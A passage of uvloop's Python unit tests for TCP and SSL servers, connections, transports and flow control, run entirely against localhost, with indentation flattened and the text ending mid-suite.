from uvloop import _testbase as tb
SSL_HANDSHAKE_TIMEOUT = 15.0
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
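# Illustrative sketch, not part of the original suite: MyBaseProto is
# normally handed to create_connection and its futures awaited. The helper
# below is hypothetical and never called by these tests.
async def _example_use_base_proto(loop, addr):
    tr, proto = await loop.create_connection(lambda: MyBaseProto(loop), *addr)
    await proto.connected   # resolved in connection_made()
    tr.close()
    await proto.done        # resolved in connection_lost()
    return proto.nbytes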
class _TestTCP:
def test_create_server_1(self):
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
TIMEOUT = 5.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
data = await reader.readexactly(len(B_DATA))
self.assertEqual(data, B_DATA)
writer.writelines([b'S', b'P'])
writer.write(bytearray(b'A'))
writer.write(memoryview(b'M'))
if self.implementation == 'uvloop':
tr = writer.transport
sock = tr.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
await writer.drain()
writer.close()
CNT += 1
async def test_client(addr):
sock = socket.socket()
with sock:
sock.setblocking(False)
await self.loop.sock_connect(sock, addr)
await self.loop.sock_sendall(sock, A_DATA)
buf = b''
while len(buf) != 2:
buf += await self.loop.sock_recv(sock, 1)
self.assertEqual(buf, b'OK')
await self.loop.sock_sendall(sock, B_DATA)
buf = b''
while len(buf) != 4:
buf += await self.loop.sock_recv(sock, 1)
self.assertEqual(buf, b'SPAM')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(sock._io_refs, 0)
self.assertTrue(sock._closed)
async def start_server():
nonlocal CNT
CNT = 0
srv = await asyncio.start_server(
handle_client,
('127.0.0.1', 'localhost'), 0,
family=socket.AF_INET)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
self.assertTrue(srv.is_serving())
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
self.loop.call_soon(srv.close)
await srv.wait_closed()
# Check that the server cleaned up its proxy sockets
for srv_sock in srv_socks:
self.assertEqual(srv_sock.fileno(), -1)
self.assertFalse(srv.is_serving())
async def start_server_sock():
nonlocal CNT
CNT = 0
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
srv = await asyncio.start_server(
handle_client,
None, None,
family=socket.AF_INET,
sock=sock)
self.assertIs(srv.get_loop(), self.loop)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
self.assertTrue(srv.is_serving())
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
srv.close()
await srv.wait_closed()
# Check that the server cleaned up its proxy sockets
for srv_sock in srv_socks:
self.assertEqual(srv_sock.fileno(), -1)
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
self.loop.run_until_complete(start_server_sock())
self.assertEqual(CNT, TOTAL_CNT)
def test_create_server_2(self):
with self.assertRaisesRegex(ValueError, 'nor sock were specified'):
self.loop.run_until_complete(self.loop.create_server(object))
def test_create_server_3(self):
''' Check that an ephemeral port can be used '''
async def start_server_ephemeral_ports():
for port_sentinel in [0, None]:
srv = await self.loop.create_server(
asyncio.Protocol,
'127.0.0.1', port_sentinel,
family=socket.AF_INET)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
self.assertTrue(srv.is_serving())
host, port = srv_socks[0].getsockname()
self.assertNotEqual(0, port)
self.loop.call_soon(srv.close)
await srv.wait_closed()
# Check that the server cleaned up its proxy sockets
for srv_sock in srv_socks:
self.assertEqual(srv_sock.fileno(), -1)
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server_ephemeral_ports())
def test_create_server_4(self):
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
with sock:
addr = sock.getsockname()
with self.assertRaisesRegex(OSError,
r"error while attempting.*\('127.*: "
r"address already in use"):
self.loop.run_until_complete(
self.loop.create_server(object, *addr))
def test_create_server_5(self):
# Test that create_server sets the IPV6_V6ONLY flag on the IPv6
# socket, so it can bind to IPv4 and IPv6 addresses
# simultaneously.
port = tb.find_free_port()
async def runner():
srv = await self.loop.create_server(
asyncio.Protocol,
None, port)
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(runner())
def test_create_server_6(self):
if not hasattr(socket, 'SO_REUSEPORT'):
raise unittest.SkipTest(
'The system does not support SO_REUSEPORT')
port = tb.find_free_port()
async def runner():
srv1 = await self.loop.create_server(
asyncio.Protocol,
None, port,
reuse_port=True)
srv2 = await self.loop.create_server(
asyncio.Protocol,
None, port,
reuse_port=True)
srv1.close()
srv2.close()
await srv1.wait_closed()
await srv2.wait_closed()
self.loop.run_until_complete(runner())
def test_create_server_7(self):
# Test that create_server() stores a hard ref to the server object
# somewhere in the loop. In asyncio it so happens that
# loop.sock_accept() has a reference to the server object so it
# never gets GCed.
class Proto(asyncio.Protocol):
def connection_made(self, tr):
self.tr = tr
self.tr.write(b'hello')
async def test():
port = tb.find_free_port()
srv = await self.loop.create_server(Proto, '127.0.0.1', port)
wsrv = weakref.ref(srv)
del srv
gc.collect()
gc.collect()
gc.collect()
s = socket.socket(socket.AF_INET)
with s:
s.setblocking(False)
await self.loop.sock_connect(s, ('127.0.0.1', port))
d = await self.loop.sock_recv(s, 100)
self.assertEqual(d, b'hello')
srv = wsrv()
srv.close()
await srv.wait_closed()
del srv
# Let all transports shutdown.
await asyncio.sleep(0.1)
gc.collect()
gc.collect()
gc.collect()
self.assertIsNone(wsrv())
self.loop.run_until_complete(test())
def test_create_server_8(self):
with self.assertRaisesRegex(
ValueError, 'ssl_handshake_timeout is only meaningful'):
self.loop.run_until_complete(
self.loop.create_server(
lambda: None, host='::', port=0, ssl_handshake_timeout=10))
def test_create_server_9(self):
async def handle_client(reader, writer):
pass
async def start_server():
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
start_serving=False)
await srv.start_serving()
self.assertTrue(srv.is_serving())
# call start_serving again
await srv.start_serving()
self.assertTrue(srv.is_serving())
srv.close()
await srv.wait_closed()
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server())
def test_create_server_10(self):
async def handle_client(reader, writer):
pass
async def start_server():
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
start_serving=False)
async with srv:
fut = asyncio.ensure_future(srv.serve_forever())
await asyncio.sleep(0)
self.assertTrue(srv.is_serving())
fut.cancel()
with self.assertRaises(asyncio.CancelledError):
await fut
self.assertFalse(srv.is_serving())
self.loop.run_until_complete(start_server())
def test_create_connection_open_con_addr(self):
async def client(addr):
reader, writer = await asyncio.open_connection(*addr)
writer.write(b'AAAA')
self.assertEqual(await reader.readexactly(2), b'OK')
re = r'(a bytes-like object)|(must be byte-ish)'
with self.assertRaisesRegex(TypeError, re):
writer.write('AAAA')
writer.write(b'BBBB')
self.assertEqual(await reader.readexactly(4), b'SPAM')
if self.implementation == 'uvloop':
tr = writer.transport
sock = tr.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
writer.close()
await self.wait_closed(writer)
self._test_create_connection_1(client)
def test_create_connection_open_con_sock(self):
async def client(addr):
sock = socket.socket()
sock.connect(addr)
reader, writer = await asyncio.open_connection(sock=sock)
writer.write(b'AAAA')
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(b'BBBB')
self.assertEqual(await reader.readexactly(4), b'SPAM')
if self.implementation == 'uvloop':
tr = writer.transport
sock = tr.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
writer.close()
await self.wait_closed(writer)
self._test_create_connection_1(client)
def _test_create_connection_1(self, client):
CNT = 0
TOTAL_CNT = 100
def server(sock):
data = sock.recv_all(4)
self.assertEqual(data, b'AAAA')
sock.send(b'OK')
data = sock.recv_all(4)
self.assertEqual(data, b'BBBB')
sock.send(b'SPAM')
async def client_wrapper(addr):
await client(addr)
nonlocal CNT
CNT += 1
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
run(client_wrapper)
def test_create_connection_2(self):
sock = socket.socket()
with sock:
sock.bind(('127.0.0.1', 0))
addr = sock.getsockname()
async def client():
reader, writer = await asyncio.open_connection(*addr)
writer.close()
await self.wait_closed(writer)
async def runner():
with self.assertRaises(ConnectionRefusedError):
await client()
self.loop.run_until_complete(runner())
def test_create_connection_3(self):
CNT = 0
TOTAL_CNT = 100
def server(sock):
data = sock.recv_all(4)
self.assertEqual(data, b'AAAA')
sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(*addr)
writer.write(b'AAAA')
with self.assertRaises(asyncio.IncompleteReadError):
await reader.readexactly(10)
writer.close()
await self.wait_closed(writer)
nonlocal CNT
CNT += 1
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
run(client)
def test_create_connection_4(self):
sock = socket.socket()
sock.close()
async def client():
reader, writer = await asyncio.open_connection(sock=sock)
writer.close()
await self.wait_closed(writer)
async def runner():
with self.assertRaisesRegex(OSError, 'Bad file'):
await client()
self.loop.run_until_complete(runner())
def test_create_connection_5(self):
def server(sock):
try:
data = sock.recv_all(4)
except ConnectionError:
return
self.assertEqual(data, b'AAAA')
sock.send(b'OK')
async def client(addr):
fut = asyncio.ensure_future(
self.loop.create_connection(asyncio.Protocol, *addr))
await asyncio.sleep(0)
fut.cancel()
with self.assertRaises(asyncio.CancelledError):
await fut
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_create_connection_6(self):
with self.assertRaisesRegex(
ValueError, 'ssl_handshake_timeout is only meaningful'):
self.loop.run_until_complete(
self.loop.create_connection(
lambda: None, host='::', port=0, ssl_handshake_timeout=10))
def test_transport_shutdown(self):
CNT = 0 # number of clients that were successful
TOTAL_CNT = 100 # total number of clients that test will create
TIMEOUT = 5.0 # timeout for this test
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(4)
self.assertEqual(data, b'AAAA')
writer.write(b'OK')
writer.write_eof()
writer.write_eof()
await writer.drain()
writer.close()
CNT += 1
async def test_client(addr):
reader, writer = await asyncio.open_connection(*addr)
writer.write(b'AAAA')
data = await reader.readexactly(2)
self.assertEqual(data, b'OK')
writer.close()
await self.wait_closed(writer)
async def start_server():
nonlocal CNT
CNT = 0
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET)
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
def test_tcp_handle_exception_in_connection_made(self):
# Test that if connection_made raises an exception,
# 'create_connection' still returns.
# Silence error logging
self.loop.set_exception_handler(lambda *args: None)
fut = asyncio.Future()
connection_lost_called = asyncio.Future()
async def server(reader, writer):
try:
await reader.read()
finally:
writer.close()
class Proto(asyncio.Protocol):
def connection_made(self, tr):
1 / 0
def connection_lost(self, exc):
connection_lost_called.set_result(exc)
srv = self.loop.run_until_complete(asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET))
async def runner():
tr, pr = await asyncio.wait_for(
self.loop.create_connection(
Proto, *srv.sockets[0].getsockname()),
timeout=1.0)
fut.set_result(None)
tr.close()
self.loop.run_until_complete(runner())
srv.close()
self.loop.run_until_complete(srv.wait_closed())
self.loop.run_until_complete(fut)
self.assertIsNone(
self.loop.run_until_complete(connection_lost_called))
def test_context_run_segfault(self):
is_new = False
done = self.loop.create_future()
def server(sock):
sock.sendall(b'hello')
class Protocol(asyncio.Protocol):
def __init__(self):
self.transport = None
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
try:
self = weakref.ref(self)
nonlocal is_new
if is_new:
done.set_result(data)
else:
is_new = True
new_proto = Protocol()
self().transport.set_protocol(new_proto)
new_proto.connection_made(self().transport)
new_proto.data_received(data)
except Exception as e:
done.set_exception(e)
async def test(addr):
await self.loop.create_connection(Protocol, *addr)
data = await done
self.assertEqual(data, b'hello')
with self.tcp_server(server) as srv:
self.loop.run_until_complete(test(srv.addr))
class Test_UV_TCP(_TestTCP, tb.UVTestCase):
def test_create_server_buffered_1(self):
SIZE = 123123
eof = False
fut = asyncio.Future()
class Proto(asyncio.BaseProtocol):
def connection_made(self, tr):
self.tr = tr
self.recvd = b''
self.data = bytearray(50)
self.buf = memoryview(self.data)
def get_buffer(self, sizehint):
return self.buf
def buffer_updated(self, nbytes):
self.recvd += self.buf[:nbytes]
if self.recvd == b'a' * SIZE:
self.tr.write(b'hello')
def eof_received(self):
nonlocal eof
eof = True
def connection_lost(self, exc):
fut.set_result(exc)
async def test():
port = tb.find_free_port()
srv = await self.loop.create_server(Proto, '127.0.0.1', port)
s = socket.socket(socket.AF_INET)
with s:
s.setblocking(False)
await self.loop.sock_connect(s, ('127.0.0.1', port))
await self.loop.sock_sendall(s, b'a' * SIZE)
d = await self.loop.sock_recv(s, 100)
self.assertEqual(d, b'hello')
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(test())
self.loop.run_until_complete(fut)
self.assertTrue(eof)
self.assertIsNone(fut.result())
def test_create_server_buffered_2(self):
class ProtoExc(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
1 / 0
def buffer_updated(self, nbytes):
pass
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
class ProtoZeroBuf1(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
return bytearray(0)
def buffer_updated(self, nbytes):
pass
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
class ProtoZeroBuf2(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
return memoryview(bytearray(0))
def buffer_updated(self, nbytes):
pass
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
class ProtoUpdatedError(asyncio.BaseProtocol):
def __init__(self):
self._lost_exc = None
def get_buffer(self, sizehint):
return memoryview(bytearray(100))
def buffer_updated(self, nbytes):
raise RuntimeError('oups')
def connection_lost(self, exc):
self._lost_exc = exc
def eof_received(self):
pass
async def test(proto_factory, exc_type, exc_re):
port = tb.find_free_port()
proto = proto_factory()
srv = await self.loop.create_server(
lambda: proto, '127.0.0.1', port)
try:
s = socket.socket(socket.AF_INET)
with s:
s.setblocking(False)
await self.loop.sock_connect(s, ('127.0.0.1', port))
await self.loop.sock_sendall(s, b'a')
d = await self.loop.sock_recv(s, 100)
if not d:
raise ConnectionResetError
except ConnectionResetError:
pass
else:
self.fail("server didn't abort the connection")
return
finally:
srv.close()
await srv.wait_closed()
if proto._lost_exc is None:
self.fail("connection_lost() was not called")
return
with self.assertRaisesRegex(exc_type, exc_re):
raise proto._lost_exc
self.loop.set_exception_handler(lambda loop, ctx: None)
self.loop.run_until_complete(
test(ProtoExc, RuntimeError, 'unhandled error .* get_buffer'))
self.loop.run_until_complete(
test(ProtoZeroBuf1, RuntimeError, 'unhandled error .* get_buffer'))
self.loop.run_until_complete(
test(ProtoZeroBuf2, RuntimeError, 'unhandled error .* get_buffer'))
self.loop.run_until_complete(
test(ProtoUpdatedError, RuntimeError, r'^oups$'))
def test_transport_get_extra_info(self):
# This test is only for uvloop; asyncio should pass it
# too in Python 3.6.
fut = asyncio.Future()
async def handle_client(reader, writer):
with self.assertRaises(asyncio.IncompleteReadError):
await reader.readexactly(4)
writer.close()
# Previously, when we used socket.fromfd to create a socket
# for UVTransports (to make get_extra_info() work), a duplicate
# of the socket was created, preventing UVTransport from being
# properly closed.
# This test ensures that the server handler will receive an EOF
# and finish the request.
fut.set_result(None)
async def test_client(addr):
t, p = await self.loop.create_connection(
lambda: asyncio.Protocol(), *addr)
if hasattr(t, 'get_protocol'):
p2 = asyncio.Protocol()
self.assertIs(t.get_protocol(), p)
t.set_protocol(p2)
self.assertIs(t.get_protocol(), p2)
t.set_protocol(p)
self.assertFalse(t._paused)
self.assertTrue(t.is_reading())
t.pause_reading()
t.pause_reading() # Check that it's OK to call it 2nd time.
self.assertTrue(t._paused)
self.assertFalse(t.is_reading())
t.resume_reading()
t.resume_reading() # Check that it's OK to call it 2nd time.
self.assertFalse(t._paused)
self.assertTrue(t.is_reading())
sock = t.get_extra_info('socket')
self.assertIs(sock, t.get_extra_info('socket'))
sockname = sock.getsockname()
peername = sock.getpeername()
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.add_writer(sock.fileno(), lambda: None)
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.remove_writer(sock.fileno())
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.add_reader(sock.fileno(), lambda: None)
with self.assertRaisesRegex(RuntimeError, 'is used by transport'):
self.loop.remove_reader(sock.fileno())
self.assertEqual(t.get_extra_info('sockname'),
sockname)
self.assertEqual(t.get_extra_info('peername'),
peername)
t.write(b'OK') # We want server to fail.
self.assertFalse(t._closing)
t.abort()
self.assertTrue(t._closing)
self.assertFalse(t.is_reading())
# Check that pause_reading and resume_reading don't raise
# errors if called after the transport is closed.
t.pause_reading()
t.resume_reading()
await fut
# Test that peername and sockname are available after
# the transport is closed.
self.assertEqual(t.get_extra_info('peername'),
peername)
self.assertEqual(t.get_extra_info('sockname'),
sockname)
async def start_server():
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET)
addr = srv.sockets[0].getsockname()
await test_client(addr)
srv.close()
await srv.wait_closed()
self.loop.run_until_complete(start_server())
def test_create_server_float_backlog(self):
# asyncio spits out a warning we cannot suppress
async def runner(bl):
await self.loop.create_server(
asyncio.Protocol,
None, 0, backlog=bl)
for bl in (1.1, '1'):
with self.subTest(backlog=bl):
with self.assertRaisesRegex(TypeError, 'integer'):
self.loop.run_until_complete(runner(bl))
def test_many_small_writes(self):
N = 10000
TOTAL = 0
fut = self.loop.create_future()
async def server(reader, writer):
nonlocal TOTAL
while True:
d = await reader.read(10000)
if not d:
break
TOTAL += len(d)
fut.set_result(True)
writer.close()
async def run():
srv = await asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET)
addr = srv.sockets[0].getsockname()
r, w = await asyncio.open_connection(*addr)
DATA = b'x' * 102400
# Test _StreamWriteContext with short sequences of writes
w.write(DATA)
await w.drain()
for _ in range(3):
w.write(DATA)
await w.drain()
for _ in range(10):
w.write(DATA)
await w.drain()
for _ in range(N):
w.write(DATA)
try:
w.write('a')
except TypeError:
pass
await w.drain()
for _ in range(N):
w.write(DATA)
await w.drain()
w.close()
await fut
await self.wait_closed(w)
srv.close()
await srv.wait_closed()
self.assertEqual(TOTAL, N * 2 * len(DATA) + 14 * len(DATA))
self.loop.run_until_complete(run())
@unittest.skipIf(sys.version_info[:3] >= (3, 8, 0),
"3.8 has a different method of GCing unclosed streams")
def test_tcp_handle_unclosed_gc(self):
fut = self.loop.create_future()
async def server(reader, writer):
writer.transport.abort()
fut.set_result(True)
async def run():
addr = srv.sockets[0].getsockname()
await asyncio.open_connection(*addr)
await fut
srv.close()
await srv.wait_closed()
srv = self.loop.run_until_complete(asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET))
if self.loop.get_debug():
rx = r'unclosed resource <TCP.*; ' \
r'object created at(.|\n)*test_tcp_handle_unclosed_gc'
else:
rx = r'unclosed resource <TCP.*'
with self.assertWarnsRegex(ResourceWarning, rx):
self.loop.create_task(run())
self.loop.run_until_complete(srv.wait_closed())
self.loop.run_until_complete(asyncio.sleep(0.1))
srv = None
gc.collect()
gc.collect()
gc.collect()
self.loop.run_until_complete(asyncio.sleep(0.1))
# Since one TCPTransport handle wasn't closed correctly,
# we need to disable this check:
self.skip_unclosed_handles_check()
def test_tcp_handle_abort_in_connection_made(self):
async def server(reader, writer):
try:
await reader.read()
finally:
writer.close()
class Proto(asyncio.Protocol):
def connection_made(self, tr):
tr.abort()
srv = self.loop.run_until_complete(asyncio.start_server(
server,
'127.0.0.1', 0,
family=socket.AF_INET))
async def runner():
tr, pr = await asyncio.wait_for(
self.loop.create_connection(
Proto, *srv.sockets[0].getsockname()),
timeout=1.0)
# Asyncio would return a closed socket, which we
# can't do: the transport was aborted, hence there
# is no FD to attach a socket to (to make
# get_extra_info() work).
self.assertIsNone(tr.get_extra_info('socket'))
tr.close()
self.loop.run_until_complete(runner())
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_connect_accepted_socket_ssl_args(self):
with self.assertRaisesRegex(
ValueError, 'ssl_handshake_timeout is only meaningful'):
with socket.socket() as s:
self.loop.run_until_complete(
self.loop.connect_accepted_socket(
(lambda: None),
s,
ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT
)
)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket(socket.AF_INET)
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket(socket.AF_INET)
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
extras = {}
if server_ssl:
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
f = loop.create_task(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl,
**extras))
loop.run_forever()
conn.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
tr, _ = f.result()
if server_ssl:
self.assertIn('SSL', tr.__class__.__name__)
tr.close()
# let it close
self.loop.run_until_complete(asyncio.sleep(0.1))
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets')
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyBaseProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'no Unix sockets')
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyBaseProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_flowcontrol_mixin_set_write_limits(self):
async def client(addr):
paused = False
class Protocol(asyncio.Protocol):
def pause_writing(self):
nonlocal paused
paused = True
def resume_writing(self):
nonlocal paused
paused = False
t, p = await self.loop.create_connection(Protocol, *addr)
t.write(b'q' * 512)
self.assertEqual(t.get_write_buffer_size(), 512)
t.set_write_buffer_limits(low=16385)
self.assertFalse(paused)
self.assertEqual(t.get_write_buffer_limits(), (16385, 65540))
with self.assertRaisesRegex(ValueError, 'high.*must be >= low'):
t.set_write_buffer_limits(high=0, low=1)
t.set_write_buffer_limits(high=1024, low=128)
self.assertFalse(paused)
self.assertEqual(t.get_write_buffer_limits(), (128, 1024))
t.set_write_buffer_limits(high=256, low=128)
self.assertTrue(paused)
self.assertEqual(t.get_write_buffer_limits(), (128, 256))
t.close()
with self.tcp_server(lambda sock: sock.recv_all(1),
max_clients=1,
backlog=1) as srv:
self.loop.run_until_complete(client(srv.addr))
class Test_AIO_TCP(_TestTCP, tb.AIOTestCase):
pass
class _TestSSL(tb.SSLTestCase):
ONLYCERT = tb._cert_fullname(__file__, 'ssl_cert.pem')
ONLYKEY = tb._cert_fullname(__file__, 'ssl_key.pem')
PAYLOAD_SIZE = 1024 * 100
TIMEOUT = 60
def test_create_server_ssl_1(self):
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
TIMEOUT = 10.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
clients = []
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
data = await reader.readexactly(len(B_DATA))
self.assertEqual(data, B_DATA)
writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')])
await writer.drain()
writer.close()
CNT += 1
async def test_client(addr):
fut = asyncio.Future()
def prog(sock):
try:
sock.starttls(client_sslctx)
sock.connect(addr)
sock.send(A_DATA)
data = sock.recv_all(2)
self.assertEqual(data, b'OK')
sock.send(B_DATA)
data = sock.recv_all(4)
self.assertEqual(data, b'SPAM')
sock.close()
except Exception as ex:
self.loop.call_soon_threadsafe(fut.set_exception, ex)
else:
self.loop.call_soon_threadsafe(fut.set_result, None)
client = self.tcp_client(prog)
client.start()
clients.append(client)
await fut
async def start_server():
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
ssl=sslctx,
**extras)
try:
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
finally:
self.loop.call_soon(srv.close)
await srv.wait_closed()
with self._silence_eof_received_warning():
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
for client in clients:
client.stop()
def test_create_connection_ssl_1(self):
if self.implementation == 'asyncio':
# Don't crash on asyncio errors
self.loop.set_exception_handler(None)
CNT = 0
TOTAL_CNT = 25
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
def server(sock):
sock.starttls(
sslctx,
server_side=True)
data = sock.recv_all(len(A_DATA))
self.assertEqual(data, A_DATA)
sock.send(b'OK')
data = sock.recv_all(len(B_DATA))
self.assertEqual(data, B_DATA)
sock.send(b'SPAM')
sock.close()
async def client(addr):
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
**extras)
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
async def client_sock(addr):
sock = socket.socket()
sock.connect(addr)
reader, writer = await asyncio.open_connection(
sock=sock,
ssl=client_sslctx,
server_hostname='')
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
sock.close()
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
with self._silence_eof_received_warning():
run(client)
with self._silence_eof_received_warning():
run(client_sock)
def test_create_connection_ssl_slow_handshake(self):
